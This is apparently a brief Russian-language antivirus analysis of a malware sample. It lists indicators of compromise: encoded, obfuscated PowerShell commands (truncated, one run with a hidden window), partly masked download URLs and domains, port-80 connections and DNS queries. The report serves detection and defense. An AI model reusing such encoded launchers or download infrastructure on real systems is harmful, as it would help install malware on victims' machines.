Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAFUAQQBaAF8AawA9ACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBjACcALAAnAEEAYwBBACcAKQAsACcAQQAnACkALAAnAE4AJwApADsAJAB1AEIAQQBBAG8AQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1544
- %TEMP%\1090602.cvr
- 'ta###rma.com':80
- 'si####tecplc.com':80
- 'ea###eti.com':80
- http://ta###rma.com/dovij7lgjd/ki_oD/
- http://ea###eti.com/wp-content/o_qO/
- DNS ASK ta###rma.com
- DNS ASK si####tecplc.com
- DNS ASK se###cii.com
- DNS ASK vv##88.ru
- DNS ASK ea###eti.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABiAFUAQQBaAF8AawA9ACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAoACIAewAxAH0AewAwAH0AIgAtAGYAIAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBjACcALAAnAEEAYwBBACcAKQAsACcAQQAnACkALAAnAE4AJwApADsAJAB1AEIAQQBBAG8AQ...' (со скрытым окном)